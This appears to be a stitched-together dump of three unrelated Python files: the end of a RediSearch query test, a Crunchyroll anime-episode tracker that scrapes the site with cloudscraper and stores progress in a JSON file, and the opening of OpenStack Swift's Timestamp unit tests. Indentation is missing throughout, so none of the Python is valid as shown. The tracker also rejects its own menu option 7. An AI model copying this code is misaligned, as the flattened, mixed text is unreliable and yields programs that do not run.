def testCriteriaTesterDeactivated():
env = Env(moduleArgs='_MAX_RESULTS_TO_UNSORTED_MODE 1')
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello1 hey hello2')
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', 't1', 'hello2 hey')
env.cmd('ft.add', 'idx', 'doc3', 1, 'fields', 't1', 'hey')
env.expect('ft.search', 'idx', '(hey hello1)|(hello2 hey)').equal([2L, 'doc1', ['t1', 'hello1 hey hello2'], 'doc2', ['t1', 'hello2 hey']])
def grouper(iterable, n, fillvalue=None):
"Collect data into fixed-length chunks or blocks"
from itertools import izip_longest
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(fillvalue=fillvalue, *args)
def to_dict(r):
return {r[i]: r[i + 1] for i in range(0, len(r), 2)}
|
Crunchyroll_Tracker.py
|
import cloudscraper
from bs4 import BeautifulSoup
import json
import copy
import time
from colorama import Fore, Style
import threading
# GENERAL
verif_sair = False
# if anime.json does not exist:
try:
with open('anime.json', 'r') as anime_json:
pass
except FileNotFoundError:
print('Creating file...')
with open('anime.json', 'w') as anime_json:
json_data = []
json.dump(json_data, anime_json)
print('File created!')
# PARSING THE INFORMATION
scraper = cloudscraper.create_scraper()
# FUNCTIONS
def alpha_sort(dictionaries):
for i in dictionaries:
return i
def check_list():
print('These are the animes you are tracking:')
with open('anime.json', 'r') as anime_json:
json_data = json.load(anime_json)
# FOR ELEMENTOS (DICIONÁRIOS) IN LISTA -> FOR CHAVE EM CADA ELEMENTO(DICIONARIO)
for anime in json_data:
for name in anime:
print(f'{Fore.BLUE}{Style.BRIGHT}{name}{Style.RESET_ALL}')
def check_anime():
anime_check = input('>>> Which anime you want to check? ')
anime_check = anime_check.strip()
verif_anime = False
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
# ABRINDO A LISTA DA CHAVE ANIME
for anime in json_data:
# PEGANDO A CHAVE DE CADA DICIONARIO, QUE É O NOME DO ANIME
for name in anime:
if name.lower() == anime_check.lower():
verif_anime = True
for i in range(0, len(anime[name])):
line = f" Season: {anime[name][i]['season']} - Last Episode Released:" \
f" {anime[name][i]['last available episode']} - " \
f"Last episode you watched: {anime[name][i]['last watched episode']}"
print(line)
if verif_anime is True:
break
if verif_anime is False:
print(f'Anime {anime_check} is not in your list')
def add_to_list():
verif_site = False
verif_list = False
anime_add = input('>>> Inform the anime you want to be tracked: ')
anime_add = anime_add.strip()
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
for anime in json_data:
for name in anime:
if anime_add.lower() == name.lower():
print('Anime already on the list!')
verif_list = True
break
if verif_list is False:
try:
letter = anime_add[0]
except IndexError:
print('Invalid Anime')
else:
if str.isalpha(letter) is True:
url = scraper.get('https://www.crunchyroll.com/pt-br/videos/anime/alpha',
params={'group': letter.lower()})
else:
url = scraper.get('https://www.crunchyroll.com/pt-br/videos/anime/alpha', params={'group': 'numeric'})
soup = BeautifulSoup(url.content, features='lxml')
data = soup.find('ul', {'class': "landscape-grid"})
data = data.find_all('li')
for tag in data:
anime_name = tag.div.a['title']
if anime_name.lower() == anime_add.lower():
anime_add = anime_name
anime_url = ('https://www.crunchyroll.com' + tag.div.a['href'])
anime_url_s = scraper.get('https://www.crunchyroll.com' + tag.div.a['href'])
# CHECKING THE LAST EPISODE
soup = BeautifulSoup(anime_url_s.content, features='lxml')
data = soup.find('ul', {'class': "list-of-seasons cf"})
data_2 = data.find_all('li', {'class': "season small-margin-bottom"})
# MUDANÇA A PARTIR DAQUI!!
if len(data_2) == 0:
try:
episode_num = data.div.span.text.strip()
episode_title = data.div.p.text.strip()
except AttributeError:
pass
else:
dict_anime = {
anime_add: [{'season': '-', 'last available episode': episode_num + ' - ' + episode_title,
'last watched episode': 'Episódio -', 'url': anime_url, 'season_id': 1}]}
finally:
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
json_data.append(dict_anime)
json_data.sort(key=alpha_sort)
anime_json.seek(0)
json.dump(json_data, anime_json, indent=2)
print(f'Anime {anime_add} is now being tracked!')
verif_site = True
break
elif len(data_2) > 0:
data = data_2
list_value = []
ordem = len(data_2) + 1
for tag_anime in data:
ordem = ordem - 1
sub_anime = tag_anime.a['title']
try:
episode_num = tag_anime.find('div').span.text.strip()
episode_title = tag_anime.find('div').p.text.strip()
except AttributeError:
episode_num = 'Episódio -'
episode_title = '-'
finally:
dict_value = {'season': sub_anime,
'last available episode': episode_num + ' - ' + episode_title,
'last watched episode': 'Episódio -', 'url': anime_url, 'season_id': ordem}
list_value.append(dict_value)
list_value.sort(key=lambda e: e['season_id'], reverse=True)
dict_anime = {anime_add: list_value}
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
json_data.append(dict_anime)
json_data.sort(key=alpha_sort)
anime_json.seek(0)
json.dump(json_data, anime_json, indent=2)
print(f'Anime {anime_add} is now being tracked!')
verif_site = True
break
if verif_site is False:
print(f'Anime {anime_add} is not on Crunchyroll')
def update_list():
option_up = input('>>> Which anime do you want to update in your list? ')
option_up = option_up.strip()
verif_episode = False
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
# ABRINDO A LISTA DA CHAVE ANIME
for anime in json_data:
# PEGANDO A CHAVE DE CADA DICIONARIO, QUE É O NOME DO ANIME
for name in anime:
if name.lower() == option_up.lower():
option_up = name
verif_episode = True
if verif_episode is True:
print(f'{option_up}:')
for seasons in anime[option_up]:
print(f"{seasons['season']} - season ID: {seasons['season_id']}")
print('')
season_id = input('>>> Inform the season id of the season you want to update: ')
try:
season_id = int(season_id)
except ValueError:
print('Invalid ID')
else:
verif_id = False
for seasons in anime[option_up]:
if season_id == seasons['season_id']:
anime_dict = seasons
verif_id = True
break
if verif_id is True:
try:
episode_update = input('>>> Inform the number of the last episode'
' you watched from this anime: ')
episode_update_int = int(episode_update)
except ValueError:
print(f'>>> Invalid episode {episode_update}')
else:
a = (seasons['last available episode']).split(' ')
a = a[1]
if episode_update_int > int(a):
print(f'>>> Episode {episode_update} exceeds the last released episode')
break
else:
anime_dict_update = copy.deepcopy(anime_dict)
anime_dict_update['last watched episode'] = f'Episódio {episode_update}'
json_data.remove(anime)
anime[option_up].remove(anime_dict)
anime[option_up].append(anime_dict_update)
anime[option_up].sort(key=lambda e: e['season_id'], reverse=True)
json_data.append(anime)
json_data.sort(key=alpha_sort)
anime_json.seek(0)
json.dump(json_data, anime_json, indent=2)
anime_json.truncate()
print('Anime updated!')
break
else:
print('Invalid ID')
break
if verif_episode is False:
print(f'>>> Anime {option_up} is not in your list')
def delete_from_list():
verif_del = False
anime_del = input('>>>Inform the anime you want to stop tracking: ')
anime_del = anime_del.strip()
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
for anime in json_data:
for name in anime:
if name.lower() == anime_del.lower():
anime_dict = [i[name] for i in json_data if name in i]
anime_dict = {name: anime_dict[0]}
json_data.remove(anime_dict)
anime_json.seek(0)
json.dump(json_data, anime_json, indent=2)
anime_json.truncate()
print(f'Anime {name} deleted!')
verif_del = True
break
if verif_del is False:
print(f'Anime {anime_del} is not on your list')
def check_update_crunchy():
url = scraper.get('https://www.crunchyroll.com/pt-br/videos/anime/updated')
soup = BeautifulSoup(url.content, features='lxml')
info = soup.find_all('a', {'itemprop': "url", 'token': "shows-portraits"})
info_ep = []
for tag in info[0: 15]:
info_ep.append(tag.find('span', {'class': "series-data block ellipsis"}).text)
print('These are the latest updated animes:')
for i in range(0, 15):
print(f" {Fore.MAGENTA}{info[i]['title']} => {info_ep[i].strip()}{Style.RESET_ALL}")
def check_alpha_crunchy():
letter = input('>>> Type the letter or number you want to check: ')
# IN CASE USER TYPES MORE THAN ONE LETTER:
try:
letter = letter[0]
except IndexError:
print('Invalid option')
else:
if str.isalpha(letter) is True:
url = scraper.get('https://www.crunchyroll.com/pt-br/videos/anime/alpha', params={'group': letter.lower()})
else:
url = scraper.get('https://www.crunchyroll.com/pt-br/videos/anime/alpha', params={'group': 'numeric'})
soup = BeautifulSoup(url.content, features='lxml')
data = soup.find('ul', {'class': "landscape-grid"})
data = data.find_all('li')
for tag in data:
print(tag.div.a['title'])
def get_out():
global verif_sair
verif_sair = True
def interface():
global verif_sair
while verif_sair is False:
# - USER INTERFACE - #
print('')
print('Choose your option \n'
'1 - Check your list \n'
'2 - Check a specific anime in your list \n'
'3 - Add Anime to your list \n'
'4 - Update your last watched episodes \n'
'5 - Delete Anime from your list \n'
'6 - Check all updated animes from Crunchy \n'
'7 - Check all anime from Crunchy alphabetically \n'
'0 - Quit')
try:
option = input('>>> ')
print('')
if int(option) < 0 or int(option) > 6:
raise Exception
except Exception:
print(f'>>> Invalid {option} option')
print('')
else:
if option == '1':
check_list()
elif option == '2':
check_anime()
elif option == '3':
add_to_list()
elif option == '4':
update_list()
elif option == '5':
delete_from_list()
elif option == '6':
check_update_crunchy()
elif option == '7':
check_alpha_crunchy()
elif option == '0':
get_out()
else:
exit()
# --------------------------------------------------------------------------------------------------- #
def check_update_continually():
global verif_sair
while True:
url = scraper.get('https://www.crunchyroll.com/pt-br/videos/anime/updated')
soup = BeautifulSoup(url.content, features='lxml')
info = soup.find_all('a', {'itemprop': "url", 'token': "shows-portraits"})
info_dict_url = {}
info_dict_num = {}
for tag in info[0: 15]:
info_dict_url[tag['title']] = tag['href']
info_dict_num[tag['title']] = tag.find('span', {'class': "series-data block ellipsis"}).text.strip()
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
for anime in json_data:
for name in anime:
if name in info_dict_url:
last_watched = anime[name][0]['last watched episode'].split(' ')
last_watched = last_watched[1]
last_released = info_dict_num[name].split(' ')[1]
verif_episode = False
try:
if int(last_watched) != int(last_released):
verif_episode = True
except ValueError:
verif_episode = True
finally:
if verif_episode is True:
url = scraper.get('https://www.crunchyroll.com' + info_dict_url[name])
soup = BeautifulSoup(url.content, 'lxml')
data = soup.find('ul', {'class': "list-of-seasons cf"})
episode_num = data.div.span.text.strip()
episode_title = data.div.p.text.strip()
print(f'{Fore.BLUE}{Style.BRIGHT}{episode_num}-{episode_title}{Style.NORMAL} of '
f'{Fore.YELLOW}{Style.BRIGHT}{name}{Style.NORMAL}{Fore.BLUE}'
f' is available now!!{Style.RESET_ALL}')
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
# dictionaries
for animes in json_data:
# keys
for anime in animes:
anime_url = animes[anime][0]["url"]
url = scraper.get(anime_url)
soup = BeautifulSoup(url.content, features='lxml')
data = soup.find('ul', {'class': "list-of-seasons cf"})
data_2 = data.find_all('li', {'class': "season small-margin-bottom"})
data = data_2
ordem = len(data) + 1
list_value = []
for tag in data:
ordem = ordem - 1
sub_anime = tag.a['title']
try:
episode_num = tag.find('div').span.text.strip()
episode_title = tag.find('div').p.text.strip()
except AttributeError:
episode_num = 'Episódio -'
episode_title = '-'
finally:
dict_value = {'season': sub_anime,
'last available episode': episode_num + ' - ' + episode_title,
'last watched episode': 'Episódio -', 'url': anime_url, 'season_id': ordem}
list_value.append(dict_value)
list_value.sort(key=lambda e: e['season_id'], reverse=True)
if animes[anime] == list_value:
pass
else:
for season in animes[anime]:
season_site = list(filter(lambda e: e['season'] == season['season'], list_value))
season_site = season_site[0]
season['last available episode'] = season_site['last available episode']
season['season_id'] = season_site['season_id']
list_value.remove(season_site)
if list_value != 0:
for season in list_value:
animes[anime].append(season)
animes[anime].sort(key=lambda e: e['season_id'], reverse=True)
anime_json.seek(0)
json.dump(json_data, anime_json, indent=2)
anime_json.truncate()
for i in range(1, 1801):
if verif_sair is False:
time.sleep(1)
elif verif_sair is True:
exit(0)
threading.Thread(target=interface).start()
time.sleep(2)
threading.Thread(target=check_update_continually).start()
|
test_utils.py
|
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for swift.common.utils"""
from __future__ import print_function
from test.unit import temptree
import ctypes
import contextlib
import errno
import eventlet
import eventlet.event
import functools
import grp
import logging
import os
import mock
import random
import re
import socket
import stat
import sys
import json
import math
import six
from six import BytesIO, StringIO
from six.moves.queue import Queue, Empty
from six.moves import range
from textwrap import dedent
import tempfile
import time
import traceback
import unittest
import fcntl
import shutil
from getpass import getuser
from shutil import rmtree
from functools import partial
from tempfile import TemporaryFile, NamedTemporaryFile, mkdtemp
from netifaces import AF_INET6
from mock import MagicMock, patch
from six.moves.configparser import NoSectionError, NoOptionError
from swift.common.exceptions import Timeout, MessageTimeout, \
ConnectionTimeout, LockTimeout, ReplicationLockTimeout, \
MimeInvalid, ThreadPoolDead
from swift.common import utils
from swift.common.container_sync_realms import ContainerSyncRealms
from swift.common.header_key_dict import HeaderKeyDict
from swift.common.swob import Request, Response
from test.unit import FakeLogger
threading = eventlet.patcher.original('threading')
class MockOs(object):
def __init__(self, pass_funcs=None, called_funcs=None, raise_funcs=None):
if pass_funcs is None:
pass_funcs = []
if called_funcs is None:
called_funcs = []
if raise_funcs is None:
raise_funcs = []
self.closed_fds = []
for func in pass_funcs:
setattr(self, func, self.pass_func)
self.called_funcs = {}
for func in called_funcs:
c_func = partial(self.called_func, func)
setattr(self, func, c_func)
for func in raise_funcs:
r_func = partial(self.raise_func, func)
setattr(self, func, r_func)
def pass_func(self, *args, **kwargs):
pass
setgroups = chdir = setsid = setgid = setuid = umask = pass_func
def called_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
def raise_func(self, name, *args, **kwargs):
self.called_funcs[name] = True
raise OSError()
def dup2(self, source, target):
self.closed_fds.append(target)
def geteuid(self):
'''Pretend we are running as root.'''
return 0
def __getattr__(self, name):
# I only over-ride portions of the os module
try:
return object.__getattr__(self, name)
except AttributeError:
return getattr(os, name)
class MockUdpSocket(object):
def __init__(self, sendto_errno=None):
self.sent = []
self.sendto_errno = sendto_errno
def sendto(self, data, target):
if self.sendto_errno:
raise socket.error(self.sendto_errno,
'test errno %s' % self.sendto_errno)
self.sent.append((data, target))
def close(self):
pass
class MockSys(object):
def __init__(self):
self.stdin = TemporaryFile('w')
self.stdout = TemporaryFile('r')
self.stderr = TemporaryFile('r')
self.__stderr__ = self.stderr
self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()]
def reset_loggers():
if hasattr(utils.get_logger, 'handler4logger'):
for logger, handler in utils.get_logger.handler4logger.items():
logger.removeHandler(handler)
delattr(utils.get_logger, 'handler4logger')
if hasattr(utils.get_logger, 'console_handler4logger'):
for logger, h in utils.get_logger.console_handler4logger.items():
logger.removeHandler(h)
delattr(utils.get_logger, 'console_handler4logger')
# Reset the LogAdapter class thread local state. Use get_logger() here
# to fetch a LogAdapter instance because the items from
# get_logger.handler4logger above are the underlying logger instances,
# not the LogAdapter.
utils.get_logger(None).thread_locals = (None, None)
def reset_logger_state(f):
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
reset_loggers()
try:
return f(self, *args, **kwargs)
finally:
reset_loggers()
return wrapper
class TestTimestamp(unittest.TestCase):
"""Tests for swift.common.utils.Timestamp"""
def test_invalid_input(self):
self.assertRaises(ValueError, utils.Timestamp, time.time(), offset=-1)
def test_invalid_string_conversion(self):
t = utils.Timestamp(time.time())
self.assertRaises(TypeError, str, t)
def test_offset_limit(self):
t = 1417462430.78693
# can't have a offset above MAX_OFFSET
self.assertRaises(ValueError, utils.Timestamp, t,
offset=utils.MAX_OFFSET + 1)
# exactly max offset is fine
ts = utils.Timestamp(t, offset=utils.MAX_OFFSET)
self.assertEqual(ts.internal, '1417462430.78693_ffffffffffffffff')
# but you can't offset it further
self.assertRaises(ValueError, utils.Timestamp, ts.internal, offset=1)
# unless you start below it
ts = utils.Timestamp(t, offset=utils.MAX_OFFSET - 1)
self.assertEqual(utils.Timestamp(ts.internal, offset=1),
'1417462430.78693_ffffffffffffffff')
def test_normal_format_no_offset(self):
expected = '1402436408.91203'
test_values = (
'1402436408.91203',
'1402436408.91203_00000000',
'1402436408.912030000',
'1402436408.912030000_0000000000000',
'000001402436408.912030000',
'000001402436408.912030000_0000000000',
1402436408.91203,
1402436408.912029,
1402436408.9120300000000000,
1402436408.91202999999999999,
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.912029),
utils.Timestamp(1402436408.912029, offset=0),
utils.Timestamp('1402436408.91203'),
utils.Timestamp('1402436408.91203', offset=0),
utils.Timestamp('1402436408.91203_00000000'),
utils.Timestamp('1402436408.91203_00000000', offset=0),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(timestamp.normal, expected)
# timestamp instance can also compare to string or float
self.assertEqual(timestamp, expected)
self.assertEqual(timestamp, float(expected))
self.assertEqual(timestamp, utils.normalize_timestamp(expected))
def test_isoformat(self):
expected = '2014-06-10T22:47:32.054580'
test_values = (
'1402440452.05458',
'1402440452.054579',
'1402440452.05458_00000000',
'1402440452.054579_00000000',
'1402440452.054580000',
'1402440452.054579999',
'1402440452.054580000_0000000000000',
'1402440452.054579999_0000ff00',
'000001402440452.054580000',
'000001402440452.0545799',
'000001402440452.054580000_0000000000',
'000001402440452.054579999999_00000fffff',
1402440452.05458,
1402440452.054579,
1402440452.0545800000000000,
1402440452.054579999,
utils.Timestamp(1402440452.05458),
utils.Timestamp(1402440452.0545799),
utils.Timestamp(1402440452.05458, offset=0),
utils.Timestamp(1402440452.05457999999, offset=0),
utils.Timestamp(1402440452.05458, offset=100),
utils.Timestamp(1402440452.054579, offset=100),
utils.Timestamp('1402440452.05458'),
utils.Timestamp('1402440452.054579999'),
utils.Timestamp('1402440452.05458', offset=0),
utils.Timestamp('1402440452.054579', offset=0),
utils.Timestamp('1402440452.05458', offset=300),
utils.Timestamp('1402440452.05457999', offset=300),
utils.Timestamp('1402440452.05458_00000000'),
utils.Timestamp('1402440452.05457999_00000000'),
utils.Timestamp('1402440452.05458_00000000', offset=0),
utils.Timestamp('1402440452.05457999_00000aaa', offset=0),
utils.Timestamp('1402440452.05458_00000000', offset=400),
utils.Timestamp('1402440452.054579_0a', offset=400),
)
for value in test_values:
self.assertEqual(utils.Timestamp(value).isoformat, expected)
expected = '1970-01-01T00:00:00.000000'
test_values = (
'0',
'0000000000.00000',
'0000000000.00000_ffffffffffff',
0,
0.0,
)
for value in test_values:
self.assertEqual(utils.Timestamp(value).isoformat, expected)
def test_not_equal(self):
ts = '1402436408.91203_0000000000000001'
test_values = (
utils.Timestamp('1402436408.91203_0000000000000002'),
utils.Timestamp('1402436408.91203'),
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91204),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.91203, offset=2),
)
for value in test_values:
self.assertTrue(value != ts)
self.assertIs(True, utils.Timestamp(ts) == ts) # sanity
self.assertIs(False, utils.Timestamp(ts) != utils.Timestamp(ts))
self.assertIs(False, utils.Timestamp(ts) != ts)
self.assertIs(False, utils.Timestamp(ts) is None)
self.assertIs(True, utils.Timestamp(ts) is not None)
def test_no_force_internal_no_offset(self):
"""Test that internal is the same as normal with no offset"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(utils.Timestamp(0).internal, '0000000000.00000')
self.assertEqual(utils.Timestamp(1402437380.58186).internal,
'1402437380.58186')
self.assertEqual(utils.Timestamp(1402437380.581859).internal,
'1402437380.58186')
self.assertEqual(utils.Timestamp(0).internal,
utils.normalize_timestamp(0))
def test_no_force_internal_with_offset(self):
"""Test that internal always includes the offset if significant"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(utils.Timestamp(0, offset=1).internal,
'0000000000.00000_0000000000000001')
self.assertEqual(
utils.Timestamp(1402437380.58186, offset=16).internal,
'1402437380.58186_0000000000000010')
self.assertEqual(
utils.Timestamp(1402437380.581859, offset=240).internal,
'1402437380.58186_00000000000000f0')
self.assertEqual(
utils.Timestamp('1402437380.581859_00000001',
offset=240).internal,
'1402437380.58186_00000000000000f1')
def test_force_internal(self):
"""Test that internal always includes the offset if forced"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=True):
self.assertEqual(utils.Timestamp(0).internal,
'0000000000.00000_0000000000000000')
self.assertEqual(utils.Timestamp(1402437380.58186).internal,
'1402437380.58186_0000000000000000')
self.assertEqual(utils.Timestamp(1402437380.581859).internal,
'1402437380.58186_0000000000000000')
self.assertEqual(utils.Timestamp(0, offset=1).internal,
'0000000000.00000_0000000000000001')
self.assertEqual(
utils.Timestamp(1402437380.58186, offset=16).internal,
'1402437380.58186_0000000000000010')
self.assertEqual(
utils.Timestamp(1402437380.581859, offset=16).internal,
'1402437380.58186_0000000000000010')
def test_internal_format_no_offset(self):
expected = '1402436408.91203_0000000000000000'
test_values = (
'1402436408.91203',
'1402436408.91203_00000000',
'1402436408.912030000',
'1402436408.912030000_0000000000000',
'000001402436408.912030000',
'000001402436408.912030000_0000000000',
1402436408.91203,
1402436408.9120300000000000,
1402436408.912029,
1402436408.912029999999999999,
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.912029),
utils.Timestamp(1402436408.91202999999999999, offset=0),
utils.Timestamp('1402436408.91203'),
utils.Timestamp('1402436408.91203', offset=0),
utils.Timestamp('1402436408.912029'),
utils.Timestamp('1402436408.912029', offset=0),
utils.Timestamp('1402436408.912029999999999'),
utils.Timestamp('1402436408.912029999999999', offset=0),
)
for value in test_values:
# timestamp instance is always equivalent
self.assertEqual(utils.Timestamp(value), expected)
if utils.FORCE_INTERNAL:
# the FORCE_INTERNAL flag makes the internal format always
# include the offset portion of the timestamp even when it's
# not significant and would be bad during upgrades
self.assertEqual(utils.Timestamp(value).internal, expected)
else:
# unless we FORCE_INTERNAL, when there's no offset the
# internal format is equivalent to the normalized format
self.assertEqual(utils.Timestamp(value).internal,
'1402436408.91203')
def test_internal_format_with_offset(self):
expected = '1402436408.91203_00000000000000f0'
test_values = (
'1402436408.91203_000000f0',
'1402436408.912030000_0000000000f0',
'1402436408.912029_000000f0',
'1402436408.91202999999_0000000000f0',
'000001402436408.912030000_000000000f0',
'000001402436408.9120299999_000000000f0',
utils.Timestamp(1402436408.91203, offset=240),
utils.Timestamp(1402436408.912029, offset=240),
utils.Timestamp('1402436408.91203', offset=240),
utils.Timestamp('1402436408.91203_00000000', offset=240),
utils.Timestamp('1402436408.91203_0000000f', offset=225),
utils.Timestamp('1402436408.9120299999', offset=240),
utils.Timestamp('1402436408.9120299999_00000000', offset=240),
utils.Timestamp('1402436408.9120299999_00000010', offset=224),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(timestamp.internal, expected)
# can compare with offset if the string is internalized
self.assertEqual(timestamp, expected)
# if comparison value only includes the normalized portion and the
# timestamp includes an offset, it is considered greater
normal = utils.Timestamp(expected).normal
self.assertTrue(timestamp > normal,
'%r is not bigger than %r given %r' % (
timestamp, normal, value))
self.assertTrue(timestamp > float(normal),
'%r is not bigger than %f given %r' % (
timestamp, float(normal), value))
def test_short_format_with_offset(self):
expected = '1402436408.91203_f0'
timestamp = utils.Timestamp(1402436408.91203, 0xf0)
self.assertEqual(expected, timestamp.short)
expected = '1402436408.91203'
timestamp = utils.Timestamp(1402436408.91203)
self.assertEqual(expected, timestamp.short)
def test_raw(self):
expected = 140243640891203
timestamp = utils.Timestamp(1402436408.91203)
self.assertEqual(expected, timestamp.raw)
# 'raw' does not include offset
timestamp = utils.Timestamp(1402436408.91203, 0xf0)
self.assertEqual(expected, timestamp.raw)
def test_delta(self):
def _assertWithinBounds(expected, timestamp):
tolerance = 0.00001
minimum = expected - tolerance
maximum = expected + tolerance
self.assertTrue(float(timestamp) > minimum)
self.assertTrue(float(timestamp) < maximum)
timestamp = utils.Timestamp(1402436408.91203, delta=100)
_assertWithinBounds(1402436408.91303, timestamp)
self.assertEqual(140243640891303, timestamp.raw)
timestamp = utils.Timestamp(1402436408.91203, delta=-100)
_assertWithinBounds(1402436408.91103, timestamp)
self.assertEqual(140243640891103, timestamp.raw)
timestamp = utils.Timestamp(1402436408.91203, delta=0)
_assertWithinBounds(1402436408.91203, timestamp)
self.assertEqual(140243640891203, timestamp.raw)
# delta is independent of offset
timestamp = utils.Timestamp(1402436408.91203, offset=42, delta=100)
self.assertEqual(140243640891303, timestamp.raw)
self.assertEqual(42, timestamp.offset)
# cannot go negative
self.assertRaises(ValueError, utils.Timestamp, 1402436408.91203,
delta=-140243640891203)
def test_int(self):
expected = 1402437965
test_values = (
'1402437965.91203',
'1402437965.91203_00000000',
'1402437965.912030000',
'1402437965.912030000_0000000000000',
'000001402437965.912030000',
'000001402437965.912030000_0000000000',
1402437965.91203,
1402437965.9120300000000000,
1402437965.912029,
1402437965.912029999999999999,
utils.Timestamp(1402437965.91203),
utils.Timestamp(1402437965.91203, offset=0),
utils.Timestamp(1402437965.91203, offset=500),
utils.Timestamp(1402437965.912029),
utils.Timestamp(1402437965.91202999999999999, offset=0),
utils.Timestamp(1402437965.91202999999999999, offset=300),
utils.Timestamp('1402437965.91203'),
utils.Timestamp('1402437965.91203', offset=0),
utils.Timestamp('1402437965.91203', offset=400),
utils.Timestamp('1402437965.912029'),
utils.Timestamp('1402437965.912029', offset=0),
utils.Timestamp('1402437965.912029', offset=200),
utils.Timestamp('1402437965.912029999999999'),
utils.Timestamp('1402437965.912029999999999', offset=0),
utils.Timestamp('1402437965.912029999999999', offset=100),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(int(timestamp), expected)
self.assertTrue(timestamp > expected)
def test_float(self):
expected = 1402438115.91203
test_values = (
'1402438115.91203',
'1402438115.91203_00000000',
'1402438115.912030000',
'1402438115.912030000_0000000000000',
'000001402438115.912030000',
'000001402438115.912030000_0000000000',
1402438115.91203,
1402438115.9120300000000000,
1402438115.912029,
1402438115.912029999999999999,
utils.Timestamp(1402438115.91203),
utils.Timestamp(1402438115.91203, offset=0),
utils.Timestamp(1402438115.91203, offset=500),
utils.Timestamp(1402438115.912029),
utils.Timestamp(1402438115.91202999999999999, offset=0),
utils.Timestamp(1402438115.91202999999999999, offset=300),
utils.Timestamp('1402438115.91203'),
utils.Timestamp('1402438115.91203', offset=0),
utils.Timestamp('1402438115.91203', offset=400),
utils.Timestamp('1402438115.912029'),
utils.Timestamp('1402438115.912029', offset=0),
utils.Timestamp('1402438115.912029', offset=200),
utils.Timestamp('1402438115.912029999999999'),
utils.Timestamp('1402438115.912029999999999', offset=0),
utils.Timestamp('1402438115.912029999999999', offset=100),
)
tolerance = 0.00001
minimum = expected - tolerance
maximum = expected + tolerance
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertTrue(float(timestamp) > minimum,
'%f is not bigger than %f given %r' % (
timestamp, minimum, value))
self.assertTrue(float(timestamp) < maximum,
'%f is not smaller than %f given %r' % (
timestamp, maximum, value))
# direct comparison of timestamp works too
self.assertTrue(timestamp > minimum,
'%s is not bigger than %f given %r' % (
timestamp.normal, minimum, value))
self.assertTrue(timestamp < maximum,
'%s is not smaller than %f given %r' % (
timestamp.normal, maximum, value))
# ... even against strings
self.assertTrue(timestamp > '%f' % minimum,
'%s is not bigger than %s given %r' % (
timestamp.normal, minimum, value))
self.assertTrue(timestamp < '%f' % maximum,
'%s is not smaller than %s given %r' % (
timestamp.normal, maximum, value))
def test_false(self):
self.assertFalse(utils.Timestamp(0))
self.assertFalse(utils.Timestamp(0, offset=0))
self.assertFalse(utils.Timestamp('0'))
self.assertFalse(utils.Timestamp('0', offset=0))
self.assertFalse(utils.Timestamp(0.0))
self.assertFalse(utils.Timestamp(0.0, offset=0))
self.assertFalse(utils.Timestamp('0.0'))
self.assertFalse(utils.Timestamp('0.0', offset=0))
self.assertFalse(utils.Timestamp(00000000.00000000))
self.assertFalse(utils.Timestamp(00000000.00000000, offset=0))
self.assertFalse(utils.Timestamp('00000000.00000000'))
self.assertFalse(utils.Timestamp('00000000.00000000', offset=0))
def test_true(self):
self.assertTrue(utils.Timestamp(1))
self.assertTrue(utils.Timestamp(1, offset=1))
self.assertTrue(utils.Timestamp(0, offset=1))
self.assertTrue(utils.Timestamp('1'))
self.assertTrue(utils.Timestamp('1', offset=1))
self.assertTrue(utils.Timestamp('0', offset=1))
self.assertTrue(utils.Timestamp(1.1))
self.assertTrue(utils.Timestamp(1.1, offset=1))
self.assertTrue(utils.Timestamp(0.0, offset=1))
self.assertTrue(utils.Timestamp('1.1'))
self.assertTrue(utils.Timestamp('1.1', offset=1))
self.assertTrue(utils.Timestamp('0.0', offset=1))
self.assertTrue(utils.Timestamp(11111111.11111111))
self.assertTrue(utils.Timestamp(11111111.11111111, offset=1))
self.assertTrue(utils.Timestamp(00000000.00000000, offset=1))
self.assertTrue(utils.Timestamp('11111111.11111111'))
self.assertTrue(utils.Timestamp('11111111.11111111', offset=1))
self.assertTrue(utils.Timestamp('00000000.00000000', offset=1))
def test_greater_no_offset(self):
now = time.time()
older = now - 1
timestamp = utils.Timestamp(now)
test_values = (
0, '0', 0.0, '0.0', '0000.0000', '000.000_000',
1, '1', 1.1, '1.1', '1111.1111', '111.111_111',
1402443112.213252, '1402443112.213252', '1402443112.213252_ffff',
older, '%f' % older, '%f_0000ffff' % older,
)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
